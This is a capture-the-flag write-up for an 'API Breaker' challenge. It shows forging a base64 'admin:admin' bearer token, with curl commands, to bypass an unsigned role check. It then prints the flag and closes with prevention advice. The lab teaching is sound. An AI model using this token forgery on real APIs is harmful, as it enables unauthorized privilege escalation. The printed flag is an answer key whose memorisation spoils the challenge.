API Breaker

Detailed Solution

Step 1: Understanding the API Structure

First, let's examine the available endpoints and understand how the API works:

• POST /login - Authenticates users and returns a base64-encoded token
• GET /profile - Returns user profile information (requires Authorization header)
• GET /secret - Returns user secrets (requires Authorization header)
• GET /admin - Admin panel that contains the flag (requires admin privileges)

Step 2: Analyzing the Vulnerability

Looking at the API code, we can identify several security flaws:

1. Token Structure: Tokens are base64-encoded strings in format 'username:role'
2. Guest User: Only 'guest' user exists with credentials guest/guest
3. Admin Check: The /admin endpoint checks: if ($username === 'admin' && $role === 'admin')
4. Missing Validation: The API doesn't verify if 'admin' exists in the users array

Step 3: Exploitation Process

Method 1: Using the API Tester Interface

1. Open the challenge in your browser at <target-ip>
2. Use the built-in API tester
3. First, login as guest:
   • Select 'POST /login' from the dropdown
   • Enter username: guest
   • Enter password: guest
   • Click 'Test API'
   • You'll receive a response like: {"success":true,"token":"Z3Vlc3Q6Z3Vlc3Q=","role":"guest"}
4. Decode the token to understand the format:
   • Token: Z3Vlc3Q6Z3Vlc3Q=
   • Base64 decode: guest:guest
5. Create the forged token:
   • We need: admin:admin
   • Base64 encode: YWRtaW46YWRtaW4=
6. Access the admin panel:
   • Select 'GET /admin' from the dropdown
   • Enter token: Bearer YWRtaW46YWRtaW4=
   • Click 'Test API'
   • You'll receive: {"message":"Welcome admin!","flag":"e3a5e662-1093-435c-8285-a60896631ab6"}

Method 2: Using curl/Postman

1. Login to get the token format:
   curl -X POST http://<target-ip>/api.php/login -H "Content-Type: application/json" -d '{"username":"guest","password":"guest"}'
2. Create the forged token manually:
   echo -n "admin:admin" | base64
   Output: YWRtaW46YWRtaW4=
3. Access admin panel with forged token:
   curl -X GET http://<target-ip>/api.php/admin -H "Authorization: Bearer YWRtaW46YWRtaW4="

Step 4: Understanding the Vulnerability

The core vulnerability is in the authentication logic:

• Incomplete Validation: The API checks if username and role match 'admin' but doesn't verify if the user exists
• Token Manipulation: Base64 tokens can be easily decoded, modified, and re-encoded
• Missing User Verification: No database lookup to confirm user existence
• Role-Based Access Control Flaw: Roles can be arbitrarily set in tokens

Step 5: Security Implications

This vulnerability demonstrates several real-world security issues:

• JWT-like Token Vulnerabilities: Similar to JWT tokens without proper signature validation
• Privilege Escalation: Users can elevate their privileges by manipulating tokens
• Insufficient Authorization: Missing proper user validation in protected endpoints
• Client-Side Token Storage: Tokens stored in client-side code can be manipulated

Step 6: Prevention and Best Practices

To prevent such vulnerabilities:

• Use Signed Tokens: Implement JWT with proper signatures
• Server-Side Validation: Always verify user existence in database
• Role Verification: Check roles against stored user data, not just token content
• Token Expiration: Implement short-lived tokens with refresh mechanisms
• HTTPS Only: Always use HTTPS to prevent token interception
• Input Validation: Validate all token components server-side

Flag

The flag is: e3a5e662-1093-435c-8285-a60896631ab6

Learning Objectives

This challenge teaches:

• API security testing methodologies
• Token-based authentication vulnerabilities
• Privilege escalation techniques
• Base64 encoding/decoding for security testing
• Authorization bypass techniques
• Real-world API security assessment